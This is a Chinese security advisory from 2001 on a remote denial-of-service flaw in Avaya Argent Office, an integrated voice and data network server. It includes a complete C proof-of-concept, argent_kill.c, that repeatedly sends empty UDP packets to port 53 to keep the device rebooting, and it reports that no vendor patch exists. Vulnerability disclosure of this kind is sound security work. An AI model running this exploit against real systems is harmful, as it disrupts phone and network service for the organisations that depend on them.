Avaya Argent Office 远程拒绝服务漏洞
发布日期:2001-08-07
更新日期:2001-08-08
受影响系统:
Network Alchemy(Avaya) Argent Office
描述:
Network Alchemy公司开发的Argent Office产品是一套综合了语音分组交换、网络数据连
接以及拨入服务功能的网络服务器。
它存在一个远程拒绝服务问题,本地网络内部的用户可以通过向它的53端口发送UDP报文
来使它重启。如果攻击者重复地发送报文,就可能造成持续的拒绝服务攻击。
<*来源:Jacek Lipkowski (
sq5bpf@acid.ch.pw.edu.pl) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Jacek Lipkowski (
sq5bpf@acid.ch.pw.edu.pl)提供了下列测试方法:
/* argent_kill.c
(c) 2001 Jacek Lipkowski sq5bpf@acid.ch.pw.edu.pl
Reboots an Argent Office box by sending udp packets with no payload to port 53
usage: argent_kill ip_address
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
main(int argc, char *argv[])
{
struct sockaddr_in addr;
struct hostent *host;
int s;
s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (s==-1) { perror("socket()"); exit(1); }
host=gethostbyname(argv[1]);
if (host==0) { herror("gethostbyname"); exit(1); }
memcpy(&addr.sin_addr,host->h_addr,host->h_length);
addr.sin_port=htons(53);
addr.sin_family=AF_INET;
if (connect(s,&addr,16)==-1) { perror("connect()"); exit(1); }
for (;;)
{
send(s,0,0,0); sleep(1); printf("."); fflush(stdout);
}
close(s);
}
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.midlandcomms.co.uk/argent_office.htm
浏览次数:3712
严重程度:0(网友投票)